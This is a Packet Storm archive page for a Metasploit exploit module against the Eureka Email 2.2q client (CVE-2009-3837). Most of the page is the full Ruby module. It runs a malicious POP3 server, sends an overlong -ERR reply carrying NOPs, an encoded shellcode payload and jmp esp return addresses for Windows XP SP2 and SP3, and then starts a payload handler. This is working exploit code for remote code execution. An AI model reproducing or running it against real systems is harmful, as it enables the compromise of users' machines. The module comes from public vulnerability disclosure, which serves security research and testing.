exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Eureka Email 2.2q ERR Remote Buffer Overflow Exploit

Eureka Email 2.2q ERR Remote Buffer Overflow Exploit
Posted Dec 31, 2009
Authored by Dr_IDE, Francis Provencher, jduck, dookie | Site metasploit.com

This Metasploit module exploits a buffer overflow in the Eureka Email 2.2q client that is triggered through an excessively long ERR message. NOTE: this exploit isn't very reliable. Unfortunately reaching the vulnerable code can only be done when manually checking mail (Ctrl-M). Checking at startup will not reach the code targeted here.

tags | exploit, overflow
advisories | CVE-2009-3837
SHA-256 | 03aa5d1fb353fd0b0a186d111853941e220644c617f4997fc853286c33067088

Eureka Email 2.2q ERR Remote Buffer Overflow Exploit

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::Egghunter

def initialize(info = {})
super(update_info(info,
'Name' => 'Eureka Email 2.2q ERR Remote Buffer Overflow Exploit',
# bof occurs due to wsprintfA @ 0x43bdf2 in "Eureka Mail.exe" v2.2.0.1
# overflows a buffer of 512 bytes, smashes a buffer of 256 bytes, then the return address
'Description' => %q{
This module exploits a buffer overflow in the Eureka Email 2.2q
client that is triggered through an excessively long ERR message.

NOTE: this exploit isn't very reliable. Unfortunately reaching the
vulnerable code can only be done when manually checking mail (Ctrl-M).
Checking at startup will not reach the code targeted here.
},
'Author' =>
[
'Francis Provencher (Protek Research Labs)',
'Dr_IDE',
'dookie',
'jduck'
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 7811 $',
'References' =>
[
[ 'CVE', '2009-3837' ],
[ 'OSVDB', '59262 ' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10235' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
'DisableNops' => true,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Win XP SP3 English', { 'Ret' => 0x7E429353 } ], # jmp esp / user32.dll
[ 'Win XP SP2 English', { 'Ret' => 0x77D8AF0A } ], # jmp esp / user32.dll
],
'Privileged' => false,
'DefaultTarget' => 0))

register_options(
[
OptPort.new('SRVPORT', [ true, "The POP3 daemon port to listen on", 110 ]),
], self.class)
end

def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)

# the offset to eip depends on the local ip address string length...
already = "Your POP3 server had a problem.\n"
already << datastore['LHOST']
already << " said:\n\n -ERR "
space = (512+256+4) - already.length

buffer = "-ERR "
buffer << make_nops(space - payload.encoded.length)
buffer << payload.encoded
buffer << [target.ret].pack('V')
buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-0x2c0").encode_string
buffer << "\r\n"

print_status("Sending exploit to #{client.peerhost}:#{client.peerport}...")
client.put(buffer)

handler
service.close_client(client)
end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close